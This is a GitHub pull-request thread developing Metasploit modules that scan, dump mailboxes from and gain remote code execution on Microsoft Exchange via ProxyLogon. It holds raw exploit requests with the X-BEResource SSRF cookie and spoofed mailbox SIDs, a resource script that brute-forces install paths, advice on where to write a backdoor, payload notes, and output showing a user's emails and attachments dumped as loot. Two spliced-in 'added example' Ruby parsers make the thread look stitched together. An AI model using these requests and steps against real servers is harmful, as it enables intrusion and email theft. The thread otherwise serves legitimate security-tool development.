
add. Auxiliary/Exploit Scanner/Gather/RCE for Exchange ProxyLogon (CVE-2021-26855) #14860

Merged · 39 commits · Mar 23, 2021

Conversation

mekhalleh

Introduction

An issue was discovered in Microsoft Exchange Server that allows an attacker to bypass authentication and impersonate the admin (CVE-2021-26855). Chaining this bug with another
post-auth arbitrary-file-write vulnerability yields code execution (CVE-2021-27065).

As a result, an unauthenticated attacker can execute arbitrary commands on Microsoft Exchange Server.

This vulnerability affects (Exchange 2013 Versions < 15.00.1497.012, Exchange 2016 CU18 < 15.01.2106.013, Exchange 2016 CU19 < 15.01.2176.009, Exchange 2019 CU7 < 15.02.0721.013,
Exchange 2019 CU8 < 15.02.0792.010).

All components are vulnerable by default.

Verification Steps

  1. Start msfconsole
  2. Do: use auxiliary/scanner/http/exchange_proxylogon
  3. Do: set RHOSTS [IP]
  4. Do: run

Options

  1. METHOD. HTTP Method to use (for CVE-2021-26855). Default: POST
  2. Proxies. This option is not set by default.
  3. RPORT. The default setting is 443. To use: set RPORT [PORT]
  4. SSL. The default setting is true.
  5. THREADS. The default setting is 1.
  6. VHOST. This option is not set by default.

Scenarios

msf6 auxiliary(scanner/http/exchange_proxylogon) > options 

Module options (auxiliary/scanner/http/exchange_proxylogon):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   METHOD   POST             yes       HTTP Method to use (for CVE-2021-26855). (Accepted: GET, POST)
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS   172.16.5.6       yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT    443              yes       The target port (TCP)
   SSL      true             no        Negotiate SSL/TLS for outgoing connections
   THREADS  1                yes       The number of concurrent threads (max one per host)
   VHOST                     no        HTTP server virtual host


msf6 auxiliary(scanner/http/exchange_proxylogon) > run

[+] https://172.16.5.6/owa/auth/x.js - The target is vulnerable to CVE-2021-26855.
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/http/exchange_proxylogon) > 

References

  1. https://proxylogon.com/
  2. https://raw.githubusercontent.com/microsoft/CSS-Exchange/main/Security/http-vuln-cve2021-26855.nse

@bcoles left a comment

Please resolve msftidy and rubocop errors:

--- Checking new and changed module syntax with tools/dev/msftidy.rb ---
modules/auxiliary/scanner/http/exchange_proxylogon.rb - [INFO] No CVE references found. Please check before you land!
modules/auxiliary/scanner/http/exchange_proxylogon.rb - [ERROR] Module should not be executable (+x)
== modules/auxiliary/scanner/http/exchange_proxylogon.rb ==
C: 12: 22: [Correctable] Layout/ModuleHashOnNewLine: update_info should start on its own line
C: 12: 23: [Correctable] Layout/ModuleHashOnNewLine: info should start on its own line
C: 25:  7: [Correctable] Layout/ModuleDescriptionIndentation: Module descriptions should be properly aligned to the 'Description' key, and within %q{ ... }
C: 43: 24: [Correctable] Layout/ModuleHashOnNewLine: A new line is missing
C: 46: 24: [Correctable] Layout/FirstArrayElementIndentation: Use 2 spaces for indentation in an array, relative to the start of the line where the left square bracket is.
C: 47: 22: [Correctable] Layout/FirstArrayElementIndentation: Indent the right bracket the same as the start of the line where the left bracket is.

1 file inspected, 6 offenses detected, 6 offenses auto-correctable
modules/auxiliary/scanner/http/exchange_proxylogon.rb - [ERROR] Rubocop failed. Please run rubocop -a modules/auxiliary/scanner/http/exchange_proxylogon.rb and verify all issues are resolved

@gwillcox-r7

Please also run tools/dev/msftidy_docs.rb on your documentation file. There are a number of lines that are overflowing that should be aligned to a max of about 120 characters in width, and the titles of a few of the sections need to change.

@cdelafuente-r7 cdelafuente-r7 self-assigned this Mar 9, 2021
@mekhalleh mekhalleh changed the title add. Auxiliary Scanner for Exchange ProxyLogon (CVE-2021-26855) add. Auxiliary Scanner/Graber for Exchange ProxyLogon (CVE-2021-26855) Mar 9, 2021
@mekhalleh mekhalleh changed the title add. Auxiliary Scanner/Graber for Exchange ProxyLogon (CVE-2021-26855) add. Auxiliary Scanner/Gather for Exchange ProxyLogon (CVE-2021-26855) Mar 9, 2021
@cdelafuente-r7 left a comment

Thanks for this great contribution @mekhalleh! I just left a few minor comments; have a look when you get a chance.

@cdelafuente-r7

I was not able to make the module grab emails and contacts from Exchange 2016 CU12 Version 15.1 (Build 1713.5); I'm getting an "Access is denied" error. The scanner module works fine and confirms the target is vulnerable. Any idea why?

Here is the response I got:

<?xml version="1.0" encoding="utf-8"?>
<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/">
  <s:Header>
    <h:ServerVersionInfo xmlns:h="http://schemas.microsoft.com/exchange/services/2006/types" xmlns="http://schemas.microsoft.com/exchange/services/2006/types" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" MajorVersion="15" MinorVersion="1" MajorBuildNumber="1713" MinorBuildNumber="5"/>
  </s:Header>
  <s:Body xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
    <m:GetFolderResponse xmlns:m="http://schemas.microsoft.com/exchange/services/2006/messages" xmlns:t="http://schemas.microsoft.com/exchange/services/2006/types">
      <m:ResponseMessages>
        <m:GetFolderResponseMessage ResponseClass="Error">
          <m:MessageText>Access is denied. Check credentials and try again., </m:MessageText>
          <m:ResponseCode>ErrorAccessDenied</m:ResponseCode>
          <m:DescriptiveLinkKey>0</m:DescriptiveLinkKey>
          <m:Folders/>
        </m:GetFolderResponseMessage>
      </m:ResponseMessages>
    </m:GetFolderResponse>
  </s:Body>
</s:Envelope>
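
The ServerVersionInfo header and the ResponseClass/ResponseCode in this reply are the two things worth pulling out of any EWS response like this one: the first tells you which build answered, the second why it refused. The Ruby below is an added example, not code from the Metasploit modules in this PR; it parses both with plain regexes (no XML library) and triages the build against the patched versions listed in the PR description, treating a CU base build that the list does not name as unpatched, which is how the description's "all components are vulnerable by default" reads. SAMPLE_REPLY is a constructed, abbreviated copy of the reply quoted above; the PATCHED_BUILDS table is my transcription of the PR's version list.

```ruby
# Added example (not code from the Metasploit modules in this PR): parse the
# ServerVersionInfo header and the response status out of an EWS SOAP reply and
# triage the build against the patched builds listed in the PR description.

# Minimum patched build per Exchange CU, transcribed from the PR description
# ([major, minor, major build] => minimum patched minor build). A CU whose base
# build is not listed is reported as :unlisted_cu and should be treated as
# unpatched, as the PR text states; extend the table if newer updates apply.
PATCHED_BUILDS = {
  [15, 0, 1497] => 12,  # Exchange 2013
  [15, 1, 2106] => 13,  # Exchange 2016 CU18
  [15, 1, 2176] => 9,   # Exchange 2016 CU19
  [15, 2, 721]  => 13,  # Exchange 2019 CU7
  [15, 2, 792]  => 10   # Exchange 2019 CU8
}.freeze

# Return [major, minor, major_build, minor_build] from the ServerVersionInfo
# element, or nil when the reply carries none or an attribute is missing.
def parse_server_version(xml)
  tag = xml[/<(?:\w+:)?ServerVersionInfo\b[^>]*>/]
  return nil unless tag
  %w[MajorVersion MinorVersion MajorBuildNumber MinorBuildNumber].map do |attr|
    value = tag[/\b#{attr}="(\d+)"/, 1]
    return nil unless value
    value.to_i
  end
end

# Return the ResponseClass attribute and ResponseCode text of the first
# response message (both nil on a reply that has neither).
def parse_response_status(xml)
  {
    response_class: xml[/ResponseClass="(\w+)"/, 1],
    code: xml[/<(?:\w+:)?ResponseCode>([^<]+)</, 1]
  }
end

# Compare a parsed version against PATCHED_BUILDS.
def triage(version)
  major, minor, major_build, minor_build = version
  threshold = PATCHED_BUILDS[[major, minor, major_build]]
  return :unlisted_cu unless threshold
  minor_build >= threshold ? :patched : :vulnerable
end

# One-call summary of a reply: dotted version, verdict, and the EWS error, if any.
def summarize(xml)
  version = parse_server_version(xml)
  status = parse_response_status(xml)
  {
    version: version && version.join('.'),
    verdict: version ? triage(version) : :no_version,
    response_class: status[:response_class],
    response_code: status[:code]
  }
end

# Constructed, abbreviated copy of the GetFolder reply quoted in the thread.
SAMPLE_REPLY = <<~XML
  <?xml version="1.0" encoding="utf-8"?>
  <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/">
    <s:Header>
      <h:ServerVersionInfo xmlns:h="http://schemas.microsoft.com/exchange/services/2006/types" MajorVersion="15" MinorVersion="1" MajorBuildNumber="1713" MinorBuildNumber="5"/>
    </s:Header>
    <s:Body>
      <m:GetFolderResponse xmlns:m="http://schemas.microsoft.com/exchange/services/2006/messages">
        <m:ResponseMessages>
          <m:GetFolderResponseMessage ResponseClass="Error">
            <m:MessageText>Access is denied. Check credentials and try again., </m:MessageText>
            <m:ResponseCode>ErrorAccessDenied</m:ResponseCode>
          </m:GetFolderResponseMessage>
        </m:ResponseMessages>
      </m:GetFolderResponse>
    </s:Body>
  </s:Envelope>
XML

if __FILE__ == $PROGRAM_NAME
  p summarize(SAMPLE_REPLY)
end
```

On the reply above this gives version 15.1.1713.5 with verdict :unlisted_cu (CU12 is not one of the CUs the PR lists a fix for) and response code ErrorAccessDenied, which separates "the build is old" from "this particular call was refused", the two things that get conflated when only the error text is read.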

@mekhalleh

You need to have two vulnerable Exchange servers to check the exploitation.

My lab is:
1 x Windows 2012 R2 server (with Active Directory), on which I've installed Exchange Server 2016.
1 x Windows 2012 R2 (member), on which I've installed another Exchange Server 2016.

Working with the collector module:

  • RHOSTS is the IP address of server 1
  • SERVER_NAME is the hostname of server 2

Note: You can also invert them, with RHOSTS set to the IP address of server 2 and SERVER_NAME set to the hostname of server 1. It works both ways!

You get this message (Access is denied. Check credentials and try again.) because the attack needs the UID of the user, and:

  1. you need to know it in advance, but it's hard to get in the remote context.
  2. you send the SSRF to the second server and the request is valid.

The module is based on this second option.

@rapid7 rapid7 deleted a comment from mekhalleh Mar 10, 2021
@je5442804

@mekhalleh The RCE module doesn't work in the Windows version of msf. I'm sure my target is exploitable, and it always seems OK, but no session comes back with windows/x64/meterpreter/reverse_tcp.
Strangely, it always prints from "[!] Wait a lot [0]" to "[!] Wait a lot [29]" before "[+] Yeeting windows/x64/meterpreter/reverse_tcp payload". It is just really slow and abnormal.

@je5442804 this is what I get when Exchange is not installed in the default directory. Would that be the case, by any chance?

set ExchangeBasePath C:\\path\\to\\exchange\\v15

Thank you so much!
Might it be possible to enumerate the Exchange path automatically in the future?

@mekhalleh

Might it be possible to enumerate the Exchange path automatically in the future?

You can already do that with msf resource scripting, using a known-path list from a file to brute-force the path.

But maybe it is possible to find a local path disclosure. I don't know.

<ruby>
  run_single('use exploit/windows/http/exchange_proxylogon_rce')
  run_single('set EMAIL gaston.lagaffe@pwned.lab')
  run_single('set RHOST X.X.X.X')
  run_single('set LHOST X.X.X.X')
  # first attempt with the default ExchangeBasePath
  run_single('run')
  # then retry once per candidate path in path.lst (one path per line)
  if File.exist?('path.lst')
    File.readlines('path.lst', chomp: true).reject(&:empty?).each do |path|
      # backslashes must be doubled on the msfconsole 'set' line
      run_single("set ExchangeBasePath #{path.gsub('\\') { '\\\\' }}")
      run_single('run')
    end
  else
    print_error('path.lst not found, skipping the path list')
  end
</ruby>

@mekhalleh

I just added a new option, UseAlternatePath (Use the IIS root dir as alternate path). If you don't know where Exchange Server is installed, you can take your chance with C:\inetpub\wwwroot\aspnet_client to write the backdoor.

@cdelafuente-r7 left a comment

Thanks for updating the code @mekhalleh. I just did a last round of review and added some comments.
In particular, the issue with oab_id throwing a NoMethodError was breaking the exploit for me. Please let me know if you have any questions.

@mekhalleh

@cdelafuente-r7 nice.. it's done ;)

@mekhalleh

@cdelafuente-r7, in the last update, I added and fixed a lot of stuff ...

RCE module

I started with the missing options for web delivery. But now there is no more need for this: I have added Powershell.

Regarding the IIS path, I added the option IISWritePath (like for Exchange). By the way, for me it does not work on the cluster IP address. If this is the case for you, try the IP of one of your live Exchange servers.

I'm just redoing a commit to remove a reference to DisablePayloadHandler and add X86 (maybe useful? Untested, Exchange 2010 32-bit)

Known issues

  1. With cmd/windows/adduser I have to change the password because, in my lab, this password does not meet the complexity requirements. And I have a default configuration (I haven't changed this). I use Meta!sploit$1 for testing.
  2. Depending on the payload used, two cmd.exe processes remain alive on the server. If this is the case, you cannot make another attempt until they are killed ...
  3. For me, set UseAlternatePath true does not work on the cluster IP. If this is the case for you, try the IP of one of your live Exchange servers.

[image]

Collector module

I've added a check that detects whether the targeted internal server is alive.

@mekhalleh

Hello @cdelafuente-r7, I'm ready to land ;) if you don't have any other comments.

@mkunz-sec

@mekhalleh I pulled your latest; both my issues remain. A proxy is still required to do the check, and the exploit fails on the OAB-id request. I'm using a fresh lab build of Exchange 2016 x64 on Server 2012R2 where AD is on another server. The Exchange write path and base path are correct with their default values.

@mekhalleh

@mekhalleh I pulled your latest; both my issues remain. A proxy is still required to do the check, and the exploit fails on the OAB-id request. I'm using a fresh lab build of Exchange 2016 x64 on Server 2012R2 where AD is on another server. The Exchange write path and base path are correct with their default values.

@mkunz-sec I use 2 different environments of Metasploit Framework.

The first env is based on the BlackArch package and the second is my development env (on Ubuntu Linux). On both envs I've had no trouble with the proxy. Maybe you have an issue with your framework.

I think @cdelafuente-r7 would have warned me about that.

But if you want, send me the traces so that I can look at where it fails ;)

With proxy and without proxy. Use set HttpTrace true.


@mkunz-sec

The trace showed an error message that helped a lot.

[image: fail]

After logging in and setting the timezone it works. We should probably check for this response.

[image: working]

Here is the scanner without the proxy being set:

[image: proxy_issue]

My lab Exchange doesn't have a valid SSL cert.

@mkunz-sec

Not sure if it helps, but here's the full HttpTrace of target 1 failing and target 0 succeeding. No AV on Exchange or AD.
[attachment: target0]

[attachment: target1.txt]

@mekhalleh

Not sure if it helps, but here's the full HttpTrace of target 1 failing and target 0 succeeding. No AV on Exchange or AD.
[attachment: target0]

[attachment: target1.txt]

If you are using the latest version of the module, you no longer need web delivery. It now uses a Powershell one-liner stager.

Also look at the known issues, especially number 2 (#14860 (comment)): depending on the payload used, two cmd.exe processes remain alive on the server. If this is the case, you cannot make another attempt until they are killed ...

But for your proxy problem? I do not know.

@mekhalleh

The trace showed an error message that helped a lot.

[image: fail]

@cdelafuente-r7 There is a test that I cannot perform in my lab, because I cannot test method 2 to get the canary.

But if you feel like doing it, the context is as follows:
/!\ WARNING: DO NOT CONNECT TO THE ADMIN MAILBOX
1 Windows 2012 + AD + Exchange (simply, on the same host).

Create a user mailbox and connect to it.

Run the module on the targeted user mailbox. If you get the following message:
[image]

replace all occurrences of:

        'msExchLogonMailbox' => patch_sid(exploit_info[1]),
        'msExchTargetMailbox' => patch_sid(exploit_info[1]),

with

        'msExchLogonMailbox' => 'S-1-5-20',
        'msExchTargetMailbox' => 'S-1-5-20',

and re-run the module. Let me know if it works.

Thanks in advance ;)

@mkunz-sec

I got the same message with a user email, with the time zone both set and not set. Changing the code to use the static SID prefix gave the same "you need to login as administrator@tech.com (I'm targeting user@tech.com) and set a time zone". Setting a time zone for both administrator and my user account gave this error with the code change.
[image: user-email]
The patch_sid method worked; you just need to fail if the response tells you to set the time zone.

@cdelafuente-r7 left a comment

Thanks for the updates and for the latest addition @mekhalleh! I tested the new Powershell target and it works great!

I just left a few comments for the last round of review.

As requested, I tested the second method to get the canary with a non-admin email. I got a slightly different error (access denied). Changing the SID to S-1-5-20 gives me the same error:

[*] Try to get a good msExchCanary (without correcting the user SID)
####################
# Request:
####################
POST /ecp/ws.js HTTP/1.1
Host: <redacted>
User-Agent: Mozilla/5.0
Cookie: X-BEResource=Admin@SRV02:444/ecp/proxyLogon.ecp?a=~2145660510;
msExchLogonMailbox: S-1-5-20
msExchTargetMailbox: S-1-5-20
Content-Type: text/xml; charset=utf-8
Content-Length: 91

<r at="Negotiate" ln="TestUserN1"><s>S-1-5-21-<redacted>-<redacted>-<redacted>-1114</s></r>
####################
# Response:
####################
HTTP/1.1 241
Cache-Control: private
Server: Microsoft-IIS/10.0
request-id: 6d866e85-c28c-4b7f-8bbb-7069f704c9fd
X-CalculatedBETarget: srv02
X-Content-Type-Options: nosniff
X-DiagInfo: SRV02
X-BEServer: SRV02
X-UA-Compatible: IE=10
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=ad7b3f3a-f3c1-4b92-8637-b8a4e4567632; path=/; secure; HttpOnly, msExchEcpCanary=z6mSmJxdgk-xkat7oAM2ycA_Vzvd7tgIZjcK8Q0_s42gb1vYcoLxcPV-qsD3o_jwAk4vwWA5pXA.; path=/ecp
X-Powered-By: ASP.NET
X-FEServer: SRV02
Date: Mon, 22 Mar 2021 15:55:21 GMT
Content-Length: 0


####################
# Request:
####################
POST /ecp/ws.js HTTP/1.1
Host: <redacted>
User-Agent: Mozilla/5.0
Cookie: X-BEResource=Admin@SRV02:444/ecp/DDI/DDIService.svc/GetList?reqId=1615583487987&schema=VirtualDirectory&msExchEcpCanary=z6mSmJxdgk-xkat7oAM2ycA_Vzvd7tgIZjcK8Q0_s42gb1vYcoLxcPV-qsD3o_jwAk4vwWA5pXA.&a=~2068268331; ASP.NET_SessionId=ad7b3f3a-f3c1-4b92-8637-b8a4e4567632; msExchEcpCanary=z6mSmJxdgk-xkat7oAM2ycA_Vzvd7tgIZjcK8Q0_s42gb1vYcoLxcPV-qsD3o_jwAk4vwWA5pXA.;
msExchLogonMailbox: S-1-5-20
msExchTargetMailbox: S-1-5-20
Content-Type: application/json; charset=utf-8
Content-Length: 159

{"filter":{"Parameters":{"__type":"JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel","SelectedView":"","SelectedVDirType":"OAB"}},"sort":{}}
####################
# Response:
####################
HTTP/1.1 500 Internal Server Error
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: application/json; charset=utf-8
Expires: -1
Server: Microsoft-IIS/10.0
request-id: 44fd24a5-4ebc-4314-bcbb-3d9dc1593efc
X-CalculatedBETarget: srv02
X-Content-Type-Options: nosniff
X-ECP-ERROR: Microsoft.Exchange.Configuration.Authorization.CmdletAccessDeniedException
jsonerror: true
X-DiagInfo: SRV02
X-BEServer: SRV02
X-UA-Compatible: IE=10
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-FEServer: SRV02
Date: Mon, 22 Mar 2021 15:55:21 GMT
Content-Length: 2125

{"Message":"Your request couldn't be completed. Please try again, and if the problem persists, contact your administrator.","ExceptionDetail":{"HelpLink":null,"InnerException":null,"Message":"You don't have permission to open this page. If you're a new user or were recently assigned credentials, please wait 15 minutes and try again.","StackTrace":"   at Microsoft.Exchange.Management.DDIService.CmdletActivity.IsRunnable(DataRow input, DataTable dataTable, DataObjectStore store)\u000d\u000a   at Microsoft.Exchange.Management.DDIService.BranchActivity.Run(DataRow input, DataTable dataTable, DataObjectStore store, Type codeBehind, UpdateTableDelegate updateTableDelegate)\u000d\u000a   at Microsoft.Exchange.Management.DDIService.Workflow.Run(DataRow input, DataTable dataTable, DataObjectStore store, Type codeBehind, UpdateTableDelegate updateTableDelegate)\u000d\u000a   at Microsoft.Exchange.Management.DDIService.WSListDataHandler.ExecuteCore(Workflow workflow)\u000d\u000a   at Microsoft.Exchange.Management.DDIService.WSDataHandler.Execute()\u000d\u000a   at Microsoft.Exchange.Management.DDIService.DDIServiceHelper.GetListCommon(DDIParameters filter, SortOptions sort, Boolean forGetProgress)\u000d\u000a   at Microsoft.Exchange.Management.DDIService.DDIService.GetList(DDIParameters filter, SortOptions sort)\u000d\u000a   at SyncInvokeGetList(Object , Object[] , Object[] )\u000d\u000a   at System.ServiceModel.Dispatcher.SyncMethodInvoker.Invoke(Object instance, Object[] inputs, Object[]& outputs)\u000d\u000a   at System.ServiceModel.Dispatcher.DispatchOperationRuntime.InvokeBegin(MessageRpc& rpc)\u000d\u000a   at System.ServiceModel.Dispatcher.ImmutableDispatchRuntime.ProcessMessage5(MessageRpc& rpc)\u000d\u000a   at System.ServiceModel.Dispatcher.ImmutableDispatchRuntime.ProcessMessage11(MessageRpc& rpc)\u000d\u000a   at System.ServiceModel.Dispatcher.MessageRpc.Process(Boolean 
isOperationContextSet)","Type":"Microsoft.Exchange.Configuration.Authorization.CmdletAccessDeniedException"},"ExceptionType":"Microsoft.Exchange.Configuration.Authorization.CmdletAccessDeniedException","StackTrace":null}
[-] Exploit aborted due to failure: not-found: No 'OAB Id' was found
[*] Exploit completed, but no session was created.

Also, would you mind adding your comment about the RCE module (known issues, etc.) to the module documentation? I think it is very valuable information and it will probably be lost in this PR thread.

If you don't have anything to add to this PR, I think we're good to land once the last round of comments are addressed.
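
The failure in the trace above is easier to read once the request/response pairs are pulled apart: the first /ecp/ws.js call comes back 241 and hands out an msExchEcpCanary in Set-Cookie, the second (the DDI GetList) comes back 500 with an X-ECP-ERROR naming CmdletAccessDeniedException, and that is the point at which the module gives up with "No 'OAB Id' was found". The Ruby below is an added example, not code from the Metasploit modules in this PR: it parses an msfconsole HttpTrace dump in the format quoted above and reports those indicators per pair, including whether the request rides on the X-BEResource backend cookie with its ~<number> suffix, which is the same marker the thread's traces show on every ProxyLogon request and is what a defender would grep a captured trace for. SAMPLE_TRACE is a constructed, abbreviated copy of the trace above with placeholder host, session-id and canary values; the keys of the result hash are my own names.

```ruby
# Added example (not code from the Metasploit modules in this PR): parse an
# msfconsole HttpTrace dump and report the ProxyLogon-related indicators in
# each request/response pair.

# Split the trace into [kind, body] pairs at the "# Request:" / "# Response:"
# banners HttpTrace prints between messages.
def split_trace(text)
  parts = text.split(/^#+\n# (Request|Response):\n#+\n/)
  parts.shift # whatever precedes the first banner (e.g. a "[*] ..." status line)
  parts.each_slice(2).to_a
end

# Turn one raw message into a hash: start line fields, lower-cased header map, body.
def parse_message(kind, body)
  head, _sep, payload = body.partition(/\r?\n\r?\n/)
  lines = head.lines.map(&:chomp)
  start = lines.shift.to_s
  headers = {}
  lines.each do |line|
    name, value = line.split(':', 2)
    headers[name.strip.downcase] = value.strip if value
  end
  msg = { kind: kind, headers: headers, body: payload.strip }
  if kind == 'Request'
    msg[:method], msg[:path] = start.split(' ')
  else
    msg[:status] = start[%r{\AHTTP/\d\.\d (\d+)}, 1].to_i
  end
  msg
end

# Per request/response pair, report:
#  - the X-BEResource value in the request Cookie (the backend-resource cookie
#    every ProxyLogon request in the trace rides on) and whether it carries
#    the ~<number> version suffix
#  - the msExchEcpCanary handed back in Set-Cookie, if any
#  - the X-ECP-ERROR exception name when the ECP call was refused
def analyze_trace(text)
  messages = split_trace(text).map { |kind, body| parse_message(kind, body) }
  messages.each_slice(2).map do |req, resp|
    cookie = req[:headers]['cookie'].to_s
    backend_cookie = cookie[/X-BEResource=([^;]+)/, 1]
    set_cookie = resp ? resp[:headers]['set-cookie'].to_s : ''
    {
      path: req[:path],
      backend_cookie: backend_cookie,
      version_suffix: !backend_cookie.nil? && backend_cookie.include?('~'),
      status: resp && resp[:status],
      canary: set_cookie[/msExchEcpCanary=([^;]+)/, 1],
      ecp_error: resp && resp[:headers]['x-ecp-error']
    }
  end
end

# Constructed, abbreviated trace in the HttpTrace format quoted in the thread;
# host, session id and canary are placeholders.
SAMPLE_TRACE = <<~TRACE
  [*] Try to get a good msExchCanary (constructed sample)
  ####################
  # Request:
  ####################
  POST /ecp/ws.js HTTP/1.1
  Host: mail.example.test
  User-Agent: Mozilla/5.0
  Cookie: X-BEResource=Admin@SRV02:444/ecp/proxyLogon.ecp?a=~2145660510;
  msExchLogonMailbox: S-1-5-20
  msExchTargetMailbox: S-1-5-20
  Content-Type: text/xml; charset=utf-8

  ####################
  # Response:
  ####################
  HTTP/1.1 241
  Server: Microsoft-IIS/10.0
  X-BEServer: SRV02
  Set-Cookie: ASP.NET_SessionId=constructed-session; path=/; secure; HttpOnly, msExchEcpCanary=constructed-canary.; path=/ecp
  X-FEServer: SRV02


  ####################
  # Request:
  ####################
  POST /ecp/ws.js HTTP/1.1
  Host: mail.example.test
  Cookie: X-BEResource=Admin@SRV02:444/ecp/DDI/DDIService.svc/GetList?schema=VirtualDirectory&msExchEcpCanary=constructed-canary.&a=~2068268331; msExchEcpCanary=constructed-canary.;
  msExchLogonMailbox: S-1-5-20
  msExchTargetMailbox: S-1-5-20
  Content-Type: application/json; charset=utf-8

  {"filter":{"Parameters":{"SelectedVDirType":"OAB"}},"sort":{}}
  ####################
  # Response:
  ####################
  HTTP/1.1 500 Internal Server Error
  Content-Type: application/json; charset=utf-8
  X-ECP-ERROR: Microsoft.Exchange.Configuration.Authorization.CmdletAccessDeniedException
  jsonerror: true
  X-BEServer: SRV02

  {"Message":"Your request couldn't be completed."}
TRACE

if __FILE__ == $PROGRAM_NAME
  analyze_trace(SAMPLE_TRACE).each do |f|
    puts "#{f[:path]} -> #{f[:status]} canary=#{f[:canary].inspect} error=#{f[:ecp_error].inspect}"
  end
end
```

Run against a real HttpTrace capture, the second finding's ecp_error is the field to look at first: a CmdletAccessDeniedException on the GetList call means the canary stage worked and the SID/mailbox context the module presented was not accepted by the backend, which matches the "slightly different error (access denied)" described in the comment.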

@mekhalleh

3. For me, set UseAlternatePath true does not work on the cluster IP. If this is the case for you, try the IP of one of your live Exchange servers.

I tested again, it works.

If you don't have anything to add to this PR, I think we're good to land once the last round of comments are addressed.

All is done ;) It was very interesting and a bit complicated too ... doing blind things like patching the SID was not easy.

@cdelafuente-r7, many thanks for your help ;)

@cdelafuente-r7

cdelafuente-r7 commented Mar 23, 2021

Thank you for this great contribution @mekhalleh and for being so responsive. It was a pleasure to work with you on these exploits.

I re-tested the 3 modules and everything looks fine. I just need to fix some minor issues that Rubocop reports on the up-to-date master branch (JSON Unnecessary symbol conversion). I'll add a new commit and land it.

One last feedback for the next contributions (I hope there will be soon!). It is recommended to submit only one module per pull request. It is usually faster to land since we don't have to wait for every module to be ready. In this case, both auxiliary modules could have been landed before the RCE.

Example output (Exchange 2016 CU12 on Windows Server 2016)

Scanner module (exchange_proxylogon)
msf6 auxiliary(scanner/http/exchange_proxylogon) > options

Module options (auxiliary/scanner/http/exchange_proxylogon):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   METHOD   POST             yes       HTTP Method to use for the check. (Accepted: GET, POST)
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS   <redacted>       yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT    443              yes       The target port (TCP)
   SSL      true             no        Negotiate SSL/TLS for outgoing connections
   THREADS  1                yes       The number of concurrent threads (max one per host)
   VHOST                     no        HTTP server virtual host

msf6 auxiliary(scanner/http/exchange_proxylogon) > set verbose true
verbose => true
msf6 auxiliary(scanner/http/exchange_proxylogon) > run

[+] https://<redacted>:443 - The target is vulnerable to CVE-2021-26855.
[+] Obtained HTTP response code 500 for https://<redacted>/ecp/n.js.
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/http/exchange_proxylogon) > vulns

Vulnerabilities
===============

Timestamp                Host           Name                                   References
---------                ----           ----                                   ----------
2021-03-23 11:10:20 UTC  <redacted>  Microsoft Exchange ProxyLogon Scanner  CVE-2021-26855,LOGO-https://proxylogon.com/images/logo.jpg,URL-https://proxylogon.com/,URL-https://aka.ms/exchangevulns
Auxiliary module (exchange_proxylogon_collector)
msf6 auxiliary(gather/exchange_proxylogon_collector) > options

Module options (auxiliary/gather/exchange_proxylogon_collector):

   Name         Current Setting         Required  Description
   ----         ---------------         --------  -----------
   ATTACHMENTS  true                    yes       Dump documents attached to an email
   EMAIL        TestUserDA@adlab.local  yes       The email account what you want dump
   FOLDER       inbox                   yes       The email folder what you want dump
   METHOD       POST                    yes       HTTP Method to use for the check (only). (Accepted: GET, POST)
   Proxies                              no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS       <redacted>              yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT        443                     yes       The target port (TCP)
   SSL          true                    no        Negotiate SSL/TLS for outgoing connections
   TARGET                               no        Force the name of the internal Exchange server targeted
   VHOST                                no        HTTP server virtual host


Auxiliary action:

   Name           Description
   ----           -----------
   Dump (Emails)  Dump user emails from exchange server


msf6 auxiliary(gather/exchange_proxylogon_collector) > set verbose true
verbose => true
msf6 auxiliary(gather/exchange_proxylogon_collector) > run
[*] Running module against <redacted>

[*] https://<redacted>:443 - Attempt to exploit for CVE-2021-26855
[*] Internal server name (SRV02)
[*] https://<redacted>:443 - Sending autodiscover request
[*] Server: f652b961-f28e-448f-a8c6-5ff447ff06dd@adlab.local
[*] LegacyDN: /o=ExchangeLab/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Recipients/cn=536cfe04ed60470a9a06efe4dfceebf6-Domain admin
[*] Internal target(s): https://srv02.adlab.local/owa/, https://srv03.adlab.local/owa/, https://srv04.adlab.local/owa/
[*] https://<redacted>:443 - Selecting the first internal server to respond
[+] Targeting internal: https://srv03.adlab.local/owa/
[*] https://<redacted>:443 - Attempt to dump emails for <TestUserDA@adlab.local>
[+] Successfuly connected to: inbox
[*] Selected folder: inbox (AQAWAFRlc3RVc2VyREFAYWRsYWIubG9jYWwALgAAA9Bu0QNzfSJCtyNN8/MAO/3dAQDAU+qesN5XT7uSUxtdH/HzAAACAQwAAAA=)
[*] Number of email found: 6
[*] https://<redacted>:443 - Processing dump of 6 items
[*] Download item: CQAAABYAAADAU+qesN5XT7uSUxtdH/HzAAADKMMt
[+] File saved to /home/msfuser/.msf4/loot/20210323121324_default_<redacted>_TestUserDAadlab_926179.txt
[*]    -> attachment: AAAWAFRlc3RVc2VyREFAYWRsYWIubG9jYWwARgAAAAAA0G7RA3N9IkK3I03z8zv93QcAwFPqnrDeV0+7klMbXR/x8wAAAAABDAAAwFPqnrDeV0+7klMbXR/x8wAAAyi2RQAAARIAEADUEUaPn4VnQp9tYQ3TKcCr (msf_cheat_sheet.pdf)
[+] File saved to /home/msfuser/.msf4/loot/20210323121324_default_<redacted>_TestUserDAadlab_302614.pdf
[*]
